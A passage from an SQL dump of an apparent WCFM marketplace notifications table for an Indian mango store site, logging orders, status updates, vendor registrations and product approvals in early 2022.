href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b> order status updated to <b>Cancelled</b>',-1,0,2,1,0,0,0,1,0,'status-update','2022-02-25 06:43:03'),(56,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b> order status updated to <b>Cancelled</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-02-25 06:43:06'),(57,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango-2/\\\\\\\">test mango 2</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/testingstore/\\\\\\\">Testingstore</a></b>',20,0,0,0,1,0,0,1,0,'status-update','2022-02-25 11:12:17'),(58,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango/\\\\\\\">test mango</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/testingstore/\\\\\\\">Testingstore</a></b>',20,0,0,0,1,0,0,1,0,'status-update','2022-02-25 11:12:19'),(59,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-25 11:17:24'),(60,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> for <b>test mango 2</b>',-1,0,20,1,0,0,0,1,0,'order','2022-02-25 11:17:24'),(61,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> for <b>test mango 7</b>',-1,0,22,1,0,0,0,1,0,'order','2022-02-25 11:17:24'),(62,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> for <b>test mango</b>',-1,0,20,1,0,0,0,1,0,'order','2022-02-25 11:17:24'),(63,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> order status updated to <b>Completed</b>',-1,0,20,1,0,0,0,1,0,'status-update','2022-02-25 11:21:26'),(64,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> order status updated to <b>Completed</b>',-1,0,22,1,0,0,0,1,0,'status-update','2022-02-25 11:21:27'),(65,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1016\\\\\\\">1016</a></b> order status updated to <b>Completed</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-02-25 11:21:29'),(66,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-25 11:25:06'),(67,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> for <b>test mango</b>',-1,0,20,1,0,0,0,1,0,'order','2022-02-25 11:25:06'),(68,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> for <b>test mango 7</b>',-1,0,22,1,0,0,0,1,0,'order','2022-02-25 11:25:06'),(69,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango/\\\\\\\">test mango</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/testingstore/\\\\\\\">Testingstore</a></b>',20,0,0,0,1,0,0,1,0,'status-update','2022-02-25 11:25:19'),(70,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1018\\\\\\\">1018</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-03 05:04:19'),(71,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1018\\\\\\\">1018</a></b> for <b>test mango 7</b>',-1,0,22,1,0,0,0,1,0,'order','2022-03-03 05:04:19'),(72,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1018\\\\\\\">1018</a></b> order status updated to <b>Completed</b>',-1,0,22,1,0,0,0,1,0,'status-update','2022-03-03 05:05:23'),(73,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1018\\\\\\\">1018</a></b> order status updated to <b>Completed</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-03-03 05:05:25'),(74,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> order status updated to <b>Cancel Request</b>',-1,0,20,1,0,0,0,1,0,'status-update','2022-03-03 05:05:41'),(75,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> order status updated to <b>Cancel Request</b>',-1,0,22,1,0,0,0,1,0,'status-update','2022-03-03 05:05:42'),(76,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> order status updated to <b>Cancelled</b>',-1,0,20,1,0,0,0,1,0,'status-update','2022-03-03 05:06:48'),(77,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> order status updated to <b>Cancelled</b>',-1,0,22,1,0,0,0,1,0,'status-update','2022-03-03 05:06:49'),(78,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1017\\\\\\\">1017</a></b> order status updated to <b>Cancelled</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-03-03 05:06:53'),(80,'<b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/vendors-manage/25\\\\\\\" target=\\\\\\\"_blank\\\\\\\">xyzabc9980</a></b> (Store: <b>xyz</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-03-03 05:19:34'),(81,'You have successfully registered to our site.',-1,0,25,1,0,0,0,1,0,'registration','2022-03-03 05:19:34'),(82,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1020\\\\\\\">mangggoo</a></b> awaiting for review',25,0,0,0,1,0,0,1,0,'product_review','2022-03-03 05:22:29'),(83,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mangggoo/\\\\\\\">mangggoo</a></b> has been approved.',-1,0,25,1,0,0,0,1,0,'product_review','2022-03-03 05:23:36'),(84,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1022\\\\\\\">1022</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-03 05:26:46'),(85,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1022\\\\\\\">1022</a></b> for <b>mangggoo</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-03 05:26:46'),(86,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1022\\\\\\\">1022</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mangggoo/\\\\\\\">mangggoo</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/xyz/\\\\\\\">xyz</a></b>',25,0,0,0,1,0,0,1,0,'status-update','2022-03-03 05:28:37'),(87,'<b>#1022</b> order status updated to <b>Completed</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-03-03 05:28:40'),(88,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1023\\\\\\\">1023</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-03 05:32:51'),(89,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1023\\\\\\\">1023</a></b> for <b>alphonsa</b>',-1,0,2,1,0,0,0,1,0,'order','2022-03-03 05:32:51'),(90,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1023\\\\\\\">1023</a></b> for <b>mangggoo</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-03 05:32:51'),(91,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1023\\\\\\\">1023</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mangggoo/\\\\\\\">mangggoo</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/xyz/\\\\\\\">xyz</a></b>',25,0,0,0,1,0,0,1,0,'status-update','2022-03-03 05:34:53'),(92,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1023\\\\\\\">1023</a></b> order status updated to <b>Cancel Request</b>',-1,0,2,1,0,0,0,1,0,'status-update','2022-03-03 05:37:48'),(93,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1023\\\\\\\">1023</a></b> order status updated to <b>Cancel Request</b>',-1,0,25,1,0,0,0,1,0,'status-update','2022-03-03 05:37:49'),(94,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/alphonsa/\\\\\\\">alphonsa</a></b> has been approved.',-1,0,2,1,0,0,0,1,0,'product_review','2022-03-03 09:58:17'),(96,'<b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/vendors-manage/21\\\\\\\" target=\\\\\\\"_blank\\\\\\\"></a></b> (Store: <b>MainStore</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-03-04 04:26:18'),(97,'You have successfully registered to our site.',-1,0,21,1,0,0,0,1,0,'registration','2022-03-04 04:26:18'),(98,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1069\\\\\\\">Appemidi 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 04:40:41'),(99,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1082\\\\\\\">Avakai 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 04:47:21'),(100,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1083\\\\\\\">Dasheri 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 04:54:11'),(101,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1084\\\\\\\">Devagad Alphonso 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 04:56:26'),(102,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1085\\\\\\\">Devagad Alphonso 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 04:57:08'),(103,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1086\\\\\\\">Ratnagiri Alphonso 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 04:59:14'),(104,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1087\\\\\\\">Ratnagiri Alphonso 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:00:16'),(105,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1088\\\\\\\">Kesar 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:04:09'),(106,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1089\\\\\\\">Kesar 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:05:12'),(107,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1091\\\\\\\">Maagaya Pickle</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:11:09'),(108,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1092\\\\\\\">Omlet Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:13:54'),(109,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1093\\\\\\\">Ramkela Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:14:53'),(110,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1094\\\\\\\">Kissan</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:15:43'),(111,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1095\\\\\\\">Rajapuri Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:16:25'),(112,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1097\\\\\\\">Raw Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:20:10'),(113,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1100\\\\\\\">Totapuri Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:27:23'),(114,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/totapuri-mango-5kg/\\\\\\\">Totapuri Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:28:55'),(115,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/raw-mango-5kg/\\\\\\\">Raw Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:29:06'),(116,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/rajapuri-mango-5kg/\\\\\\\">Rajapuri Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:29:14'),(117,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/ramkela-mango-5kg/\\\\\\\">Ramkela Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:29:21'),(118,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/omlet-mango-5kg/\\\\\\\">Omlet Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:29:30'),(119,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/maagaya-pickle/\\\\\\\">Maagaya Pickle</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:29:37'),(120,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/kesar-5kg/\\\\\\\">Kesar 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:29:50'),(121,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/kesar-3kg/\\\\\\\">Kesar 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:29:58'),(122,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/ratnagiri-alphonso-5kg/\\\\\\\">Ratnagiri Alphonso 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:30:12'),(123,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/devagad-alphonso-5kg/\\\\\\\">Devagad Alphonso 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:30:20'),(124,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/ratnagiri-alphonso-3kg/\\\\\\\">Ratnagiri Alphonso 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:30:28'),(125,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/devagad-alphonso-3kg/\\\\\\\">Devagad Alphonso 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:30:36'),(126,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/dasheri-3kg/\\\\\\\">Dasheri 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:30:43'),(127,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/avakai-5kg/\\\\\\\">Avakai 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:30:49'),(128,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/appemidi-5kg/\\\\\\\">Appemidi 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:30:58'),(129,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1102\\\\\\\">Kissan Mango Jam Glass Bottle &#8211; 188g</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:31:16'),(130,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1107\\\\\\\">Frooti Mango Drink Plastic Bottle &#8211; 600ml</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:38:11'),(131,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/frooti-mango-drink-plastic-bottle-600ml/\\\\\\\">Frooti Mango Drink Plastic Bottle &#8211; 600ml</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:39:54'),(132,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/kissan-mango-jam-glass-bottle-188g/\\\\\\\">Kissan Mango Jam Glass Bottle &#8211; 188g</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 05:40:01'),(133,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1109\\\\\\\">Frooti Mango Drink Plastic Bottle &#8211; 2l</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:41:02'),(134,'Your Store: <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/a/\\\\\\\">a</a></b> has been set off-line.',-1,0,2,1,0,0,0,1,0,'vendor-disable','2022-03-04 05:41:12'),(135,'<b></b> (Store: <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/a/\\\\\\\">a</a></b>) has been disabled.',-2,0,0,1,0,0,0,1,0,'vendor-disable','2022-03-04 05:41:23'),(136,'Your Store: <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/a/\\\\\\\">a</a></b> has been disabled.',-1,0,2,1,0,0,0,1,0,'vendor-disable','2022-03-04 05:41:24'),(137,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1111\\\\\\\">Paper Boat Aamras Tetrapack &#8211; 1l</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:46:39'),(138,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1114\\\\\\\">Banginapalli Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:52:44'),(139,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1116\\\\\\\">Banginapalli Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:54:13'),(140,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1117\\\\\\\">Tropicana Slice Fruit Drink Tetrapack &#8211; 1.2l</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:54:34'),(141,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1119\\\\\\\">Totapuri Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:58:16'),(142,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1120\\\\\\\">Totapuri Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 05:59:22'),(143,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1122\\\\\\\">Neelam Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:01:33'),(144,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1123\\\\\\\">Neelam Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:02:30'),(145,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1125\\\\\\\">Hapus Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:05:05'),(146,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1126\\\\\\\">Hapus Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:05:49'),(147,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1128\\\\\\\">Sendura Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:13:57'),(148,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1129\\\\\\\">Sendura Mango 5kg</a></b> awaiting for 